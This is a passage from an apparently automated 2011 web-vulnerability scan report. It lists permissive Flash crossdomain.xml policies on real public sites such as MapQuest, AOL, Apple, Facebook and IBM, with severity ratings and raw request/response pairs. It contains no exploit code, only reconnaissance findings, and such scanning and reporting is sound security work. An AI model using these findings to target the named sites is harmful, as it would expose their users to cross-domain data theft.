GET /crossdomain.xml HTTP/1.0
Host: www.huffingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix)
Last-Modified: Thu, 01 Jul 2010 13:55:20 GMT
ETag: "13598ce-fd-48a53d22e2200"
Content-Type: application/xml
Date: Thu, 05 May 2011 00:58:42 GMT
Content-Length: 253
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*" /><allow-http-request-headers
...[SNIP]...

3.4. http://www.mapquest.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mapquest.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="nZG12c16OqjJIk32ss/xe+wwpew="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:04 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:04 GMT; Path=/
Set-Cookie: psession="ul5Rtcgv+4mAPbUgz5v+xO8fVFE="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:04 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:04 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"209-1304454924000"
Last-Modified: Tue, 03 May 2011 20:35:24 GMT
Content-Type: application/xml
Content-Length: 209
Date: Thu, 05 May 2011 00:57:04 GMT
Connection: keep-alive

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" secure="false"/></cross-domain
...[SNIP]...

3.5. http://xml.truveo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://xml.truveo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: xml.truveo.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:31 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 20:08:41 GMT
ETag: "1294019-104-4a264b4d30440"
Accept-Ranges: bytes
Content-Length: 260
Keep-Alive: timeout=15, max=65
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
    <site-control perm
...[SNIP]...

3.6. http://www.aol.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:22 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1066
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="channelevents.estage.aol.com" />
<allow-access-from domain="channelevents.aol.com" />
<allow-access-from domain="*.office.aol.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="cdn.digitalcity.com" />
<allow-access-from domain="progressive.stream.aol.com" />
<allow-access-from domain="ad.doubleclick.net" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.unicast.com" />
...[SNIP]...

3.7. http://www.aolnews.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aolnews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aolnews.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:19 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 2128
Keep-Alive: timeout=5, max=999989
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.digitalcity.com" />
<allow-access-from domain="*.digitas.com" />
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="*.news.aol.com" />
<allow-access-from domain="*.office.aol.com" />
<allow-access-from domain="*.opticalcortex.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.popeater.com" />
<allow-access-from domain="*.publishing.aol.com" />

<allow-access-from domain="*.rewind.com" />
<allow-access-from domain="*.spinner.com" />
<allow-access-from domain="*.stats.com" />
<allow-access-from domain="*.theboombox.com" />
<allow-access-from domain="*.tmz.com" />
<allow-access-from domain="*.unicast.com" />
<allow-access-from domain="*.video.aol.com" />
<allow-access-from domain="*.video.office.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.yourminis.com" />
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="cdn.digitalcity.com" />
<allow-access-from domain="channelevents.aol.com" />
<allow-access-from domain="channelevents.estage.aol.com" />
<allow-access-from domain="goldrush.aol.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" />

<allow-access-from domain="imakealpha.com" />
<allow-access-from domain="progressive.stream.aol.com" />
<allow-access-from domain="publishing.aol.com" />
<allow-access-from domain="stage.goldrush.aol.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="static.stats.com" />
<allow-access-from domain="tmz.warnerbros.com" />
...[SNIP]...

3.8. http://www.apple.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT
ETag: "8d-3f8918f48ef00"
Server: Apache/2.2.3 (Oracle)
X-N: S
X-Cached-Time: Mon, 21 Mar 2011 16:49:30 GMT
nnCoection: close
Content-Type: application/xml
Content-Length: 141
Cache-Control: max-age=28
Expires: Thu, 05 May 2011 12:45:46 GMT
Date: Thu, 05 May 2011 12:45:18 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>

3.9. http://www.blogsmithmedia.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blogsmithmedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 23 Dec 2010 02:59:47 GMT
Content-Type: application/xml
Cache-Control: max-age=3600
Expires: Thu, 05 May 2011 01:58:26 GMT
Date: Thu, 05 May 2011 00:58:26 GMT
Content-Length: 782
Connection: close
X-N: S

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-in
...[SNIP]...
<allow-access-from domain="*.blogsmith.net" to-ports="*" />
   <allow-access-from domain="*.blogsmith.com" to-ports="*" />
   <allow-access-from domain="*.aolcdn.com" to-ports="*" />
   <allow-access-from domain="*.aol.com" to-ports="*" />
   <allow-access-from domain="*.*.aol.com" to-ports="*" />
   <allow-access-from domain="*.yourminis.com" to-ports="*" />
...[SNIP]...

3.10. http://www.citysbest.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.citysbest.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:38 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 269
Keep-Alive: timeout=5, max=999877
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
...[SNIP]...

3.11. http://www.dailyfinance.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dailyfinance.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dailyfinance.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:36 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 204
Keep-Alive: timeout=5, max=999968
Connection: Keep-Alive
Content-Type: text/xml; charset=utf-8

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.test.aol.com"/>
</cross-domain-pol
...[SNIP]...

3.12. http://www.dooce.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dooce.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dooce.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:30 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
Last-Modified: Wed, 01 Sep 2010 16:56:47 GMT
ETag: "67b2ba4-120-48f359541d1c0"
Accept-Ranges: bytes
Content-Length: 288
Cache-Control: max-age=1209600
Expires: Thu, 19 May 2011 10:56:30 GMT
Connection: close
Content-Type: application/xml

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.google-analytics.com"/>
...[SNIP]...

3.13. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.42.76.43
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

3.14. https://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.136.90.127
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

3.15. http://www.ft.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ft.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ft.com

Response

HTTP/1.1 200 OK
ETag: "51d-4ba8ec18"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Accept-Ranges: bytes
Content-Length: 1309
Date: Thu, 05 May 2011 10:57:11 GMT
Connection: close
Last-Modified: Tue, 23 Mar 2010 16:28:08 GMT
Server: Apache/1.3.37
Content-Type: text/xml
Keep-Alive: timeout=1, max=120

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ft.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.tangozebra.com" secure="true"/>
<allow-access-from domain="*.euronews.net" secure="true"/>
<allow-access-from domain="*.google.com" secure="true"/>
<allow-access-from domain="*.gstatic.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="false"/>
<allow-access-from domain="*.dartmotif.net" secure="false"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.googlesyndication.com" secure="true"/>
<allow-access-from domain="*.brightcove.com" secure="true"/>
<allow-access-from domain="*.google-analytics.com" secure="true"/>
...[SNIP]...

3.16. https://www.godaddy.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:19 GMT
Connection: close
Content-Length: 150

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.wsimg.com" /><allow-access-from domain="*.godaddy.com" /></cross-domain-policy>

3.17. http://www.ibm.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ibm.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:38 GMT
Server: IBM_HTTP_Server
Last-Modified: Sat, 01 Nov 2008 20:30:18 GMT
ETag: "153-95044a80"
Accept-Ranges: bytes
Content-Length: 339
epKe-Alive: timeout=10, max=8
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- $Id: crossdomain.xml,v 1.3 2008/08/08 15:47:24 krusch Ex
...[SNIP]...
<allow-access-from domain="*.ibm.com" />
<allow-access-from domain="*.lotus.com" />
...[SNIP]...

3.18. http://www.marketwatch.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marketwatch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 04 Nov 2010 12:22:38 GMT
Accept-Ranges: bytes
ETag: "07be2f71a7ccb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp04
Date: Thu, 05 May 2011 10:58:41 GMT
Connection: keep-alive
Content-Length: 1625

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*.marketwatch.com" />
<allow-access-from domain="*.mktw.net" />
<allow-access-from domain="creatives.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="motifcdn.doubleclick.net"/>
<allow-access-from domain="m.doubleclick.net"/>
<allow-access-from domain="m2.doubleclick.net"/>
<allow-access-from domain="m3.doubleclick.net"/>
<allow-access-from domain="m.2mdn.net"/>
<allow-access-from domain="m2.2mdn.net"/>
<allow-access-from domain="betadfa.doubleclick.net"/>
<allow-access-from domain="dfa.doubleclick.net"/>
<allow-access-from domain="motifcdn2.doubleclick.net"/>
<allow-access-from domain="ad.doubleclick.net"/>
<allow-access-from domain="m1.2mdn.net"/>
<allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.2mdn.net"/>
<allow-access-from domain="*.wsj.com"/>
<allow-access-from domain="*.allthingsd.com"/>
<allow-access-from domain="*.barrons.com"/>
<allow-access-from domain="*.wsj.net"/>
<allow-access-from domain="*.dowjones.net"/>
<allow-access-from domain="*.llnwd.net"/>
<allow-access-from domain="*.wsj.com"/>
<allow-access-from domain="*.wsjradio.com"/>
<allow-access-from domain="*.barrons.com"/>
<allow-access-from domain="aes.online.edit.dowjones.net"/>
<allow-access-from domain="api.bizographics.com"/>
...[SNIP]...

3.19. http://www.mmafighting.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mmafighting.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:18 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 1400
Keep-Alive: timeout=5, max=999791
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy><allow-access-from domain="*.aol.com"/><allow-access-from domain="*.digitalcity.com"/><allow-access-from domain="*.aolcdn.com"/><allow-access-from domain="cdn-startpage.aol.com"/><allow-access-from domain="startpage.aol.com"/><allow-access-from domain="*.channels.aol.com"/><allow-access-from domain="*.channel.aol.com"/><allow-access-from domain="*.web.aol.com"/><allow-access-from domain="*.my.aol.com"/><allow-access-from domain="*.news.aol.com"/><allow-access-from domain="iamalpha.com"/><allow-access-from domain="imakealpha.com"/><allow-access-from domain="aimcreate.mdat.aim.com:30100 "/><allow-access-from domain="*.spinner.com"/><allow-access-from domain="*.popeater.com"/><allow-access-from domain="*.theboombox.com"/><allow-access-from domain="*.opticalcortex.com"/><allow-access-from domain="static.stats.com"/><allow-access-from domain="*.moviefone.com"/><allow-access-from domain="*.aolhealth.com"/><allow-access-from domain="*.walletpop.com"/><allow-access-from domain="*.stats.com"/><allow-access-from domain="*.lightningcast.com"/><allow-access-from domain="*.yourminis.com"/><allow-access-from domain="*.fanhouse.com"/><allow-access-from domain="*.blogsmithmedia.com"/><allow-access-from domain="*.beta.fanhouse.com"/>
...[SNIP]...

3.20. http://www.moviefone.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.moviefone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.moviefone.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:49 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 317
Keep-Alive: timeout=5, max=999987
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.aolcdn.com" />
...[SNIP]...

3.21. http://www.netvibes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.netvibes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.netvibes.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 05 May 2011 10:58:52 GMT
Content-Type: text/xml
Connection: close
X-Men: 52
Accept-Ranges: bytes
Last-Modified: Wed, 27 May 2009 07:32:50 GMT
Content-Length: 211
X-slb: 1
X-Jobs: http://about.netvibes.com/jobs.php looking for a sysadmin :)

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
